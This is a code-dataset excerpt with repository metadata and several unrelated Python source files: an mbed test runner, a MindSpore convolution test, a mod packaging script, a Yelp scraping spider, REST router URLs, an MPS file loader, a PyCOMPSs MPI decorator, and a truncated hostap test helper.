hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a13d0727996194ada2cfe0e03461ab5e44a4fc8f
| 4,666
|
py
|
Python
|
src/mbed_os_tools/test/host_tests_runner/host_test.py
|
noralsydmp/mbed-os-tools
|
5a14958aa49eb5764afba8e1dc3208cae2955cd7
|
[
"Apache-2.0"
] | 1
|
2021-08-10T02:15:18.000Z
|
2021-08-10T02:15:18.000Z
|
src/mbed_os_tools/test/host_tests_runner/host_test.py
|
noralsydmp/mbed-os-tools
|
5a14958aa49eb5764afba8e1dc3208cae2955cd7
|
[
"Apache-2.0"
] | null | null | null |
src/mbed_os_tools/test/host_tests_runner/host_test.py
|
noralsydmp/mbed-os-tools
|
5a14958aa49eb5764afba8e1dc3208cae2955cd7
|
[
"Apache-2.0"
] | 1
|
2021-08-10T02:15:18.000Z
|
2021-08-10T02:15:18.000Z
|
# Copyright (c) 2018, Arm Limited and affiliates.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sys import stdout
from .mbed_base import Mbed
from ... import __version__
class HostTestResults(object):
"""! Test results set by host tests """
def enum(self, **enums):
return type('Enum', (), enums)
def __init__(self):
self.TestResults = self.enum(
RESULT_SUCCESS = 'success',
RESULT_FAILURE = 'failure',
RESULT_ERROR = 'error',
RESULT_END = 'end',
RESULT_UNDEF = 'undefined',
RESULT_TIMEOUT = 'timeout',
RESULT_IOERR_COPY = "ioerr_copy",
RESULT_IOERR_DISK = "ioerr_disk",
RESULT_IO_SERIAL = 'ioerr_serial',
RESULT_NO_IMAGE = 'no_image',
RESULT_NOT_DETECTED = "not_detected",
RESULT_MBED_ASSERT = "mbed_assert",
RESULT_PASSIVE = "passive",
RESULT_BUILD_FAILED = 'build_failed',
RESULT_SYNC_FAILED = 'sync_failed'
)
# Magically creates attributes in this class corresponding
# to RESULT_ elements in self.TestResults enum
for attr in self.TestResults.__dict__:
if attr.startswith('RESULT_'):
setattr(self, attr, self.TestResults.__dict__[attr])
# Indexes of this list define string->int mapping between
# actual strings with results
self.TestResultsList = [
self.TestResults.RESULT_SUCCESS,
self.TestResults.RESULT_FAILURE,
self.TestResults.RESULT_ERROR,
self.TestResults.RESULT_END,
self.TestResults.RESULT_UNDEF,
self.TestResults.RESULT_TIMEOUT,
self.TestResults.RESULT_IOERR_COPY,
self.TestResults.RESULT_IOERR_DISK,
self.TestResults.RESULT_IO_SERIAL,
self.TestResults.RESULT_NO_IMAGE,
self.TestResults.RESULT_NOT_DETECTED,
self.TestResults.RESULT_MBED_ASSERT,
self.TestResults.RESULT_PASSIVE,
self.TestResults.RESULT_BUILD_FAILED,
self.TestResults.RESULT_SYNC_FAILED
]
def get_test_result_int(self, test_result_str):
"""! Maps test result string to unique integer """
if test_result_str in self.TestResultsList:
return self.TestResultsList.index(test_result_str)
return -1
def __getitem__(self, test_result_str):
"""! Returns numerical result code """
return self.get_test_result_int(test_result_str)
class Test(HostTestResults):
""" Base class for host test's test runner
"""
def __init__(self, options):
""" ctor
"""
HostTestResults.__init__(self)
self.mbed = Mbed(options)
def run(self):
""" Test runner for host test. This function will start executing
test and forward test result via serial port to test suite
"""
pass
def setup(self):
"""! Setup and check if configuration for test is correct.
@details This function can for example check if serial port is already opened
"""
pass
def notify(self, msg):
"""! On screen notification function
@param msg Text message sent to stdout directly
"""
stdout.write(msg)
stdout.flush()
def print_result(self, result):
"""! Test result unified printing function
@param result Should be a member of HostTestResults.RESULT_* enums
"""
self.notify("{{%s}}\n"% result)
self.notify("{{%s}}\n"% self.RESULT_END)
def finish(self):
""" dctor for this class, finishes tasks and closes resources
"""
pass
def get_hello_string(self):
""" Hello string used as first print
"""
return "host test executor ver. " + __version__
class DefaultTestSelectorBase(Test):
"""! Test class with serial port initialization
@details This is a base for other test selectors, initializes
"""
def __init__(self, options):
Test.__init__(self, options=options)
| 34.562963
| 85
| 0.63802
|
2cec372b0353ffee85e5e63a6e8872ad068c78a5
| 1,965
|
py
|
Python
|
tests/st/ops/ascend/test_tbe_ops/test_conv.py
|
doc22940/mindspore
|
21bcdcd8adb97b9171b2822a7ed2c4c138c99607
|
[
"Apache-2.0"
] | 1
|
2020-05-13T11:31:21.000Z
|
2020-05-13T11:31:21.000Z
|
tests/st/ops/ascend/test_tbe_ops/test_conv.py
|
doc22940/mindspore
|
21bcdcd8adb97b9171b2822a7ed2c4c138c99607
|
[
"Apache-2.0"
] | null | null | null |
tests/st/ops/ascend/test_tbe_ops/test_conv.py
|
doc22940/mindspore
|
21bcdcd8adb97b9171b2822a7ed2c4c138c99607
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from mindspore import Tensor
from mindspore.ops import operations as P
import mindspore.nn as nn
from mindspore.common.api import ms_function
import numpy as np
import mindspore.context as context
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
out_channel = 64
kernel_size = 7
self.conv = P.Conv2D(out_channel,
kernel_size,
mode=1,
pad_mode="valid",
pad=0,
stride=1,
dilation=1,
group=1)
self.w = Parameter(initializer(
'normal', [64, 3, 7, 7]), name='w')
@ms_function
def construct(self, x):
return self.conv(x, self.w)
def test_net():
x = np.random.randn(32, 3, 224, 224).astype(np.float32)
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
conv = Net()
output = conv(Tensor(x))
print(output.asnumpy())
context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend")
conv = Net()
output = conv(Tensor(x))
print(output.asnumpy())
| 34.473684
| 78
| 0.612723
|
69c5d87ca7a8d396eff6423a936b7c9f6f309f7c
| 3,308
|
py
|
Python
|
mod_marksOnGunExtended/.release.py
|
stealthz67/spoter-mods-1
|
4ebd859fbb705b085ae5c4cb621edfbab476e378
|
[
"WTFPL"
] | 1
|
2020-02-06T07:13:40.000Z
|
2020-02-06T07:13:40.000Z
|
mod_marksOnGunExtended/.release.py
|
stealthz67/spoter-mods-1
|
4ebd859fbb705b085ae5c4cb621edfbab476e378
|
[
"WTFPL"
] | null | null | null |
mod_marksOnGunExtended/.release.py
|
stealthz67/spoter-mods-1
|
4ebd859fbb705b085ae5c4cb621edfbab476e378
|
[
"WTFPL"
] | 1
|
2019-12-10T19:11:55.000Z
|
2019-12-10T19:11:55.000Z
|
# -*- coding: utf-8 -*-
import glob
import os
import shutil
import subprocess
import _build as build
ZIP = 'mods_marksOnGunExtended.zip'
class Release(object):
def __init__(self, build, zip):
self.data = build
self.zipPath = os.path.join('zip', zip)
self.modsPath = os.path.join(self.data.build.OUT_PATH, 'mods')
self.versionPath = os.path.join(self.modsPath, self.data.CLIENT_VERSION, 'spoter')
self.configPath = os.path.join(self.modsPath, 'configs', 'spoter', os.path.splitext(os.path.basename(self.data.build.VERSION["config"]))[0])
self.i18n = os.path.join(self.configPath, 'i18n')
self.clearZip()
self.packZip()
self.clear()
def packZip(self):
subprocess.check_call(['powershell', 'mkdir', self.versionPath])
subprocess.check_call(['powershell', 'mkdir', self.i18n])
#copy *.wotmod
subprocess.call('powershell robocopy %s %s %s /COPYALL' % (os.path.realpath('release'), os.path.realpath(self.versionPath), self.data.build.RELEASE))
#copy config
subprocess.call('powershell robocopy %s %s %s /COPYALL' % (os.path.realpath(os.path.join(self.data.build.BUILD_PATH, os.path.dirname(self.data.build.VERSION["config"]))), os.path.realpath(self.configPath), os.path.basename(self.data.build.VERSION["config"])))
#copy i18n files
for path in glob.glob(os.path.join(self.data.build.BUILD_PATH, self.data.build.VERSION["i18n"], "*.json")):
subprocess.call('powershell robocopy %s %s %s /COPYALL' % (os.path.join(self.data.build.BUILD_PATH, self.data.build.VERSION["i18n"]), os.path.realpath(self.i18n), os.path.basename(path)))
#copy mod_mods_gui core
if os.path.exists('../../spoter-mods/mod_mods_gui/release'):
subprocess.call('powershell robocopy %s %s %s /COPYALL' %(os.path.realpath('../../spoter-mods/mod_mods_gui/release'), os.path.join(self.modsPath, self.data.CLIENT_VERSION), '*.wotmod') )
if os.path.exists('../../spoter-mods/mod_mods_gui//release/i18n'):
subprocess.call('powershell robocopy %s %s %s /COPYALL' %(os.path.realpath('../../spoter-mods/mod_mods_gui/release/i18n'), os.path.join(self.modsPath, 'configs', 'mods_gui', 'i18n'), '*.json') )
ps = '%s\%s' % (os.path.realpath(self.data.build.OUT_PATH), 'create-7zip.ps1')
with open(ps, 'w') as xfile:
xfile.write('function create-7zip([String] $aDirectory, [String] $aZipfile){ [string]$pathToZipExe = "C:\Program Files\\7-zip\\7z.exe"; [Array]$arguments = "a", "-tzip", "-ssw", "-mx9", "$aZipfile", "$aDirectory"; & $pathToZipExe $arguments; }\n'
'create-7zip "%s" "%s"\n' % (os.path.realpath(self.modsPath), os.path.realpath(self.zipPath)))
xfile.close()
subprocess.call('powershell -executionpolicy bypass -command "& {Set-ExecutionPolicy AllSigned; %s; Set-ExecutionPolicy Undefined}"' % ps)
def clearZip(self):
try:
shutil.rmtree('zip', True)
except OSError:
pass
def clear(self):
try:
shutil.rmtree(self.data.build.OUT_PATH, True)
except OSError:
pass
try:
shutil.rmtree('release', True)
except OSError:
pass
Release(build, ZIP)
| 53.354839
| 267
| 0.637848
|
c1c83f623a7a0f10a42adcfbf6caf822719fe0f2
| 953
|
py
|
Python
|
2016/tutorial_final/35/demo/demo/spiders/YelpSpider.py
|
zeromtmu/practicaldatascience.github.io
|
62950a3a3e7833552b0f2269cc3ee5c34a1d6d7b
|
[
"MIT"
] | 1
|
2021-07-06T17:36:24.000Z
|
2021-07-06T17:36:24.000Z
|
2016/tutorial_final/35/demo/demo/spiders/YelpSpider.py
|
zeromtmu/practicaldatascience.github.io
|
62950a3a3e7833552b0f2269cc3ee5c34a1d6d7b
|
[
"MIT"
] | null | null | null |
2016/tutorial_final/35/demo/demo/spiders/YelpSpider.py
|
zeromtmu/practicaldatascience.github.io
|
62950a3a3e7833552b0f2269cc3ee5c34a1d6d7b
|
[
"MIT"
] | 1
|
2021-07-06T17:36:34.000Z
|
2021-07-06T17:36:34.000Z
|
import scrapy
class YelpSpider(scrapy.Spider):
name = "yelpspider"
start_urls = [
'https://www.yelp.com/search?find_desc=Restaurants&find_loc=Pittsburgh,+PA&start=0',
]
def parse(self, response):
for r in response.css('ul.ylist.ylist-bordered.search-results'):
yield {
'restaurant_name': r.css('span.indexed-biz-name a.biz-name.js-analytics-click span::text').extract(),
'review': [float(x.split(' ')[0]) for x in r.css('div.rating-large i.star-img::attr(title)').extract()],
'review_counts': [int(x.strip().split(' ')[0]) for x in r.css('span.review-count::text').extract()],
}
next_page = response.css('a.u-decoration-none.next.pagination-links_anchor::attr(href)').extract_first()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
| 47.65
| 120
| 0.620147
|
63ba872da92e41a3e798430624650a960aa80415
| 246
|
py
|
Python
|
posts/urls.py
|
AnufriyevT/RestApiBlog
|
bb80068da371ae578ab1863ea792341e428f1034
|
[
"MIT"
] | null | null | null |
posts/urls.py
|
AnufriyevT/RestApiBlog
|
bb80068da371ae578ab1863ea792341e428f1034
|
[
"MIT"
] | null | null | null |
posts/urls.py
|
AnufriyevT/RestApiBlog
|
bb80068da371ae578ab1863ea792341e428f1034
|
[
"MIT"
] | null | null | null |
from rest_framework import routers
from posts.views import NetworkViewSet, UserViewSet
router = routers.SimpleRouter()
router.register(r'posts', NetworkViewSet)
router.register(r'users', UserViewSet)
urlpatterns = []
urlpatterns += router.urls
| 24.6
| 51
| 0.804878
|
3944ae7f91de2450e0e926f00ae58111c27c7983
| 9,792
|
py
|
Python
|
pysmps/smps_loader.py
|
bodono/pysmps
|
1141f772650914bae6ab0dc564e61667a8dcf5c4
|
[
"MIT"
] | null | null | null |
pysmps/smps_loader.py
|
bodono/pysmps
|
1141f772650914bae6ab0dc564e61667a8dcf5c4
|
[
"MIT"
] | null | null | null |
pysmps/smps_loader.py
|
bodono/pysmps
|
1141f772650914bae6ab0dc564e61667a8dcf5c4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Created on Sun Sep 8 13:28:53 2019.
@author: Julian Märte
Updated by: Brendan O'Dongohue, bodonoghue85@gmail.com, Oct 14th 2020
"""
import re
import numpy as np
import scipy.sparse
CORE_FILE_ROW_MODE = 'ROWS'
CORE_FILE_COL_MODE = 'COLUMNS'
CORE_FILE_RHS_MODE = 'RHS'
CORE_FILE_BOUNDS_MODE = 'BOUNDS'
CORE_FILE_BOUNDS_MODE_NAME_GIVEN = 'BOUNDS_NAME'
CORE_FILE_BOUNDS_MODE_NO_NAME = 'BOUNDS_NO_NAME'
CORE_FILE_RHS_MODE_NAME_GIVEN = 'RHS_NAME'
CORE_FILE_RHS_MODE_NO_NAME = 'RHS_NO_NAME'
ROW_MODE_OBJ = 'N'
def load_mps(path):
mode = ''
name = None
objective_name = None
row_names = []
types = []
col_names = []
col_types = []
A = scipy.sparse.dok_matrix((0, 0), dtype=np.float64)
c = np.array([])
rhs_names = []
rhs = {}
bnd_names = []
bnd = {}
integral_marker = False
with open(path, 'r') as reader:
for line in reader:
line = re.split(' |\t', line)
line = [x.strip() for x in line]
line = list(filter(None, line))
if line[0] == 'ENDATA':
break
if line[0] == '*':
continue
if line[0] == 'NAME':
name = line[1]
elif line[0] in [CORE_FILE_ROW_MODE, CORE_FILE_COL_MODE]:
mode = line[0]
elif line[0] == CORE_FILE_RHS_MODE and len(line) <= 2:
if len(line) > 1:
rhs_names.append(line[1])
rhs[line[1]] = np.zeros(len(row_names))
mode = CORE_FILE_RHS_MODE_NAME_GIVEN
else:
mode = CORE_FILE_RHS_MODE_NO_NAME
elif line[0] == CORE_FILE_BOUNDS_MODE and len(line) <= 2:
if len(line) > 1:
bnd_names.append(line[1])
bnd[line[1]] = {'LO': np.zeros(
len(col_names)), 'UP': np.repeat(np.inf, len(col_names))}
mode = CORE_FILE_BOUNDS_MODE_NAME_GIVEN
else:
mode = CORE_FILE_BOUNDS_MODE_NO_NAME
elif mode == CORE_FILE_ROW_MODE:
if line[0] == ROW_MODE_OBJ:
objective_name = line[1]
else:
types.append(line[0])
row_names.append(line[1])
elif mode == CORE_FILE_COL_MODE:
if len(line) > 1 and line[1] == "'MARKER'":
if line[2] == "'INTORG'":
integral_marker = True
elif line[2] == "'INTEND'":
integral_marker = False
continue
try:
i = col_names.index(line[0])
except:
if A.shape[1] == 0:
A = scipy.sparse.dok_matrix(
(len(row_names), 1), dtype=np.float64)
else:
new_col = scipy.sparse.dok_matrix(
(len(row_names), 1), dtype=np.float64)
A = scipy.sparse.hstack((A, new_col), format='dok')
col_names.append(line[0])
col_types.append(integral_marker * 'integral' +
(not integral_marker) * 'continuous')
c = np.append(c, 0)
i = -1
j = 1
while j < len(line) - 1:
if line[j] == objective_name:
c[i] = float(line[j + 1])
else:
A[row_names.index(line[j]), i] = float(line[j + 1])
j = j + 2
elif mode == CORE_FILE_RHS_MODE_NAME_GIVEN:
if line[0] != rhs_names[-1]:
raise Exception(
'Other RHS name was given even though name was set after RHS tag.')
for kk in range((len(line) - 1) // 2):
idx = kk * 2
try:
rhs[line[0]][row_names.index(
line[idx+1])] = float(line[idx+2])
except Exception as e:
if objective_name == line[idx+1]:
print("MPS read warning: objective appearing in RHS, ignoring")
else:
raise e
elif mode == CORE_FILE_RHS_MODE_NO_NAME:
if len(line) % 2 == 1: # odd: RHS named
try:
i = rhs_names.index(line[0])
except:
rhs_names.append(line[0])
rhs[line[0]] = np.zeros(len(row_names))
i = -1
for kk in range((len(line) - 1) // 2):
idx = kk * 2
try:
rhs[line[0]][row_names.index(
line[idx+1])] = float(line[idx+2])
except Exception as e:
if objective_name == line[idx+1]:
print("MPS read warning: objective appearing in RHS, ignoring")
else:
raise e
else: # even, no RHS name
try:
i = rhs_names.index("TEMP")
except:
rhs_names.append("TEMP")
rhs["TEMP"] = np.zeros(len(row_names))
i = -1
for kk in range(len(line) // 2):
idx = kk * 2
try:
rhs["TEMP"][row_names.index(
line[idx])] = float(line[idx+1])
except Exception as e:
if objective_name == line[idx]:
print("MPS read warning: objective appearing in RHS, ignoring")
else:
raise e
elif mode == CORE_FILE_BOUNDS_MODE_NAME_GIVEN:
if line[1] != bnd_names[-1]:
raise Exception(
'Other BOUNDS name was given even though name was set after BOUNDS tag.')
if line[0] in ['LO', 'UP']:
bnd[line[1]][line[0]][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'FX':
bnd[line[1]]['LO'][col_names.index(
line[2])] = float(line[3])
bnd[line[1]]['UP'][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'PL': # free positive (aka default)
bnd[line[1]]['LO'][col_names.index(line[2])] = 0
elif line[0] == 'FR': # free
bnd[line[1]]['LO'][col_names.index(line[2])] = -np.inf
elif line[0] == 'BV': # binary value
bnd[line[1]]['LO'][col_names.index(
line[2])] = 0.
bnd[line[1]]['UP'][col_names.index(
line[2])] = 1.
elif mode == CORE_FILE_BOUNDS_MODE_NO_NAME:
_bnds = ['FR', 'BV', 'PL']
if (len(line) % 2 == 0 and line[0] not in _bnds) or (len(line) % 2 == 1 and line[0] in _bnds): # even, bound has name
try:
i = bnd_names.index(line[1])
except:
bnd_names.append(line[1])
bnd[line[1]] = {'LO': np.zeros(
len(col_names)), 'UP': np.repeat(np.inf, len(col_names))}
i = -1
if line[0] in ['LO', 'UP']:
bnd[line[1]][line[0]][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'FX': # fixed
bnd[line[1]]['LO'][col_names.index(
line[2])] = float(line[3])
bnd[line[1]]['UP'][col_names.index(
line[2])] = float(line[3])
elif line[0] == 'PL': # free positive (aka default)
bnd[line[1]]['LO'][col_names.index(line[2])] = 0
elif line[0] == 'FR': # free
bnd[line[1]]['LO'][col_names.index(line[2])] = -np.inf
elif line[0] == 'BV': # binary value
bnd[line[1]]['LO'][col_names.index(
line[2])] = 0.
bnd[line[1]]['UP'][col_names.index(
line[2])] = 1.
else: # odd, bound has no name
try:
i = bnd_names.index("TEMP_BOUND")
except:
bnd_names.append("TEMP_BOUND")
bnd["TEMP_BOUND"] = {'LO': np.zeros(
len(col_names)), 'UP': np.repeat(np.inf, len(col_names))}
i = -1
if line[0] in ['LO', 'UP']:
bnd["TEMP_BOUND"][line[0]][col_names.index(
line[1])] = float(line[2])
elif line[0] == 'FX':
bnd["TEMP_BOUND"]['LO'][col_names.index(
line[1])] = float(line[2])
bnd["TEMP_BOUND"]['UP'][col_names.index(
line[1])] = float(line[2])
elif line[0] == 'FR':
bnd["TEMP_BOUND"]['LO'][col_names.index(line[1])] = -np.inf
return dict(name=name, objective_name=objective_name, row_names=row_names,
col_names=col_names, col_types=col_types, types=types, c=c, A=A,
rhs_names=rhs_names, rhs=rhs, bnd_names=bnd_names, bnd=bnd)
| 43.136564
| 131
| 0.425143
|
78126cf0df2ef751bfee1e98554220844b0b4f10
| 8,744
|
py
|
Python
|
compss/programming_model/bindings/python/src/pycompss/api/mpi.py
|
BSC-computational-genomics/compss
|
9cfc9f7b9bdab9dcb0bec083007452cda185f50c
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/api/mpi.py
|
BSC-computational-genomics/compss
|
9cfc9f7b9bdab9dcb0bec083007452cda185f50c
|
[
"Apache-2.0"
] | null | null | null |
compss/programming_model/bindings/python/src/pycompss/api/mpi.py
|
BSC-computational-genomics/compss
|
9cfc9f7b9bdab9dcb0bec083007452cda185f50c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2002-2019 Barcelona Supercomputing Center (www.bsc.es)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
PyCOMPSs API - MPI
==================
This file contains the class mpi, needed for the mpi
definition through the decorator.
"""
import inspect
import logging
import os
from functools import wraps
import pycompss.util.context as context
from pycompss.util.arguments import check_arguments
if __debug__:
logger = logging.getLogger(__name__)
MANDATORY_ARGUMENTS = {'binary',
'runner'}
SUPPORTED_ARGUMENTS = {'computing_nodes',
'working_dir',
'binary',
'runner'}
DEPRECATED_ARGUMENTS = {'computingNodes',
'workingDir'}
class Mpi(object):
"""
This decorator also preserves the argspec, but includes the __init__ and
__call__ methods, useful on mpi task creation.
"""
def __init__(self, *args, **kwargs):
"""
Store arguments passed to the decorator
# self = itself.
# args = not used.
# kwargs = dictionary with the given mpi parameters
:param args: Arguments
:param kwargs: Keyword arguments
"""
self.args = args
self.kwargs = kwargs
self.registered = False
self.scope = context.in_pycompss()
if self.scope:
if __debug__:
logger.debug("Init @mpi decorator...")
# Check the arguments
check_arguments(MANDATORY_ARGUMENTS,
DEPRECATED_ARGUMENTS,
SUPPORTED_ARGUMENTS | DEPRECATED_ARGUMENTS,
list(kwargs.keys()),
"@mpi")
# Get the computing nodes: This parameter will have to go down until
# execution when invoked.
if 'computing_nodes' not in self.kwargs and 'computingNodes' not in self.kwargs:
self.kwargs['computing_nodes'] = 1
else:
if 'computingNodes' in self.kwargs:
self.kwargs['computing_nodes'] = self.kwargs.pop('computingNodes')
computing_nodes = self.kwargs['computing_nodes']
if isinstance(computing_nodes, int):
# Nothing to do
pass
elif isinstance(computing_nodes, str):
# Check if it is an environment variable to be loaded
if computing_nodes.strip().startswith('$'):
# Computing nodes is an ENV variable, load it
env_var = computing_nodes.strip()[1:] # Remove $
if env_var.startswith('{'):
env_var = env_var[1:-1] # remove brackets
try:
self.kwargs['computing_nodes'] = int(os.environ[env_var])
except ValueError:
raise Exception("ERROR: ComputingNodes value cannot be cast from ENV variable to int")
else:
# ComputingNodes is in string form, cast it
try:
self.kwargs['computing_nodes'] = int(computing_nodes)
except ValueError:
raise Exception("ERROR: ComputingNodes value cannot be cast from string to int")
else:
raise Exception("ERROR: Wrong Computing Nodes value at MultiNode decorator.")
if __debug__:
logger.debug("This MPI task will have " + str(self.kwargs['computing_nodes']) + " computing nodes.")
else:
pass
def __call__(self, func):
"""
Parse and set the mpi parameters within the task core element.
:param func: Function to decorate
:return: Decorated function.
"""
@wraps(func)
def mpi_f(*args, **kwargs):
if not self.scope:
# from pycompss.api.dummy.mpi import mpi as dummy_mpi
# d_m = dummy_mpi(self.args, self.kwargs)
# return d_m.__call__(func)
raise Exception("The mpi decorator only works within PyCOMPSs framework.")
if context.in_master():
# master code
mod = inspect.getmodule(func)
self.module = mod.__name__ # not func.__module__
if (self.module == '__main__' or
self.module == 'pycompss.runtime.launch'):
# The module where the function is defined was run as __main__,
# we need to find out the real module name.
# path=mod.__file__
# dirs=mod.__file__.split(os.sep)
# file_name=os.path.splitext(os.path.basename(mod.__file__))[0]
# Get the real module name from our launch.py variable
path = getattr(mod, "app_path")
dirs = path.split(os.path.sep)
file_name = os.path.splitext(os.path.basename(path))[0]
mod_name = file_name
i = len(dirs) - 1
while i > 0:
new_l = len(path) - (len(dirs[i]) + 1)
path = path[0:new_l]
if "__init__.py" in os.listdir(path):
# directory is a package
i -= 1
mod_name = dirs[i] + '.' + mod_name
else:
break
self.module = mod_name
# Include the registering info related to @mpi
# Retrieve the base core_element established at @task decorator
from pycompss.api.task import current_core_element as core_element
if not self.registered:
self.registered = True
# Update the core element information with the mpi information
core_element.set_impl_type("MPI")
binary = self.kwargs['binary']
if 'working_dir' in self.kwargs:
working_dir = self.kwargs['working_dir']
else:
working_dir = '[unassigned]' # Empty or '[unassigned]'
runner = self.kwargs['runner']
impl_signature = 'MPI.' + binary
core_element.set_impl_signature(impl_signature)
impl_args = [binary, working_dir, runner]
core_element.set_impl_type_args(impl_args)
else:
# worker code
pass
# This is executed only when called.
if __debug__:
logger.debug("Executing mpi_f wrapper.")
# Set the computing_nodes variable in kwargs for its usage
# in @task decorator
kwargs['computing_nodes'] = self.kwargs['computing_nodes']
if len(args) > 0:
# The 'self' for a method function is passed as args[0]
slf = args[0]
# Replace and store the attributes
saved = {}
for k, v in self.kwargs.items():
if hasattr(slf, k):
saved[k] = getattr(slf, k)
setattr(slf, k, v)
# Call the method
import pycompss.api.task as t
t.prepend_strings = False
ret = func(*args, **kwargs)
t.prepend_strings = True
if len(args) > 0:
# Put things back
for k, v in saved.items():
setattr(slf, k, v)
return ret
mpi_f.__doc__ = func.__doc__
return mpi_f
# ############################################################################# #
# ###################### MPI DECORATOR ALTERNATIVE NAME ####################### #
# ############################################################################# #
mpi = Mpi
| 38.690265
| 116
| 0.51178
|
0b5f4317381da726bc01415fcb6d396051698f01
| 841
|
py
|
Python
|
setup.py
|
aroig/nnutil
|
88df41ee89f592a28c1661ee8837dd8e8ca42cf3
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
aroig/nnutil
|
88df41ee89f592a28c1661ee8837dd8e8ca42cf3
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
aroig/nnutil
|
88df41ee89f592a28c1661ee8837dd8e8ca42cf3
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# nnutil - Neural network utilities for tensorflow
# Copyright (c) 2018, Abdó Roig-Maranges <abdo.roig@gmail.com>
#
# This file is part of 'nnutil'.
#
# This file may be modified and distributed under the terms of the 3-clause BSD
# license. See the LICENSE file for details.
from setuptools import setup, find_packages
from nnutil import __version__
setup(
name = 'nnutil',
version = __version__,
license = 'BSD',
description = 'Neural network utilities for tensorflow',
author = 'Abdó Roig-Maranges',
author_email = 'abdo.roig@gmail.com',
packages = find_packages(),
install_requires = [
'Click',
],
entry_points = '''
[console_scripts]
nnutil=nnutil.cli:main
''',
)
| 26.28125
| 79
| 0.621879
|
aa83c1d94abeb3db657dbfb29e48b5a7ef2ce9d0
| 3,342
|
py
|
Python
|
tests/hwsim/remotehost.py
|
rainlake/hostap
|
b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7
|
[
"Unlicense"
] | null | null | null |
tests/hwsim/remotehost.py
|
rainlake/hostap
|
b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7
|
[
"Unlicense"
] | null | null | null |
tests/hwsim/remotehost.py
|
rainlake/hostap
|
b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7
|
[
"Unlicense"
] | 1
|
2022-03-25T08:21:36.000Z
|
2022-03-25T08:21:36.000Z
|
# Host class
# Copyright (c) 2016, Qualcomm Atheros, Inc.
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import logging
import subprocess
import threading
logger = logging.getLogger()
def remote_compatible(func):
func.remote_compatible = True
return func
def execute_thread(command, reply):
cmd = ' '.join(command)
logger.debug("thread run: " + cmd)
try:
status = 0
buf = subprocess.check_output(command, stderr=subprocess.STDOUT).decode()
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug("thread cmd: " + cmd)
logger.debug("thread exit status: " + str(status))
logger.debug("thread exit buf: " + str(buf))
reply.append(status)
reply.append(buf)
class Host():
def __init__(self, host=None, ifname=None, port=None, name="", user="root"):
self.host = host
self.name = name
self.user = user
self.monitors = []
self.monitor_thread = None
self.logs = []
self.ifname = ifname
self.port = port
self.dev = None
if self.name == "" and host != None:
self.name = host
def local_execute(self, command):
logger.debug("execute: " + str(command))
try:
status = 0
buf = subprocess.check_output(command, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
status = e.returncode
buf = e.output
logger.debug("status: " + str(status))
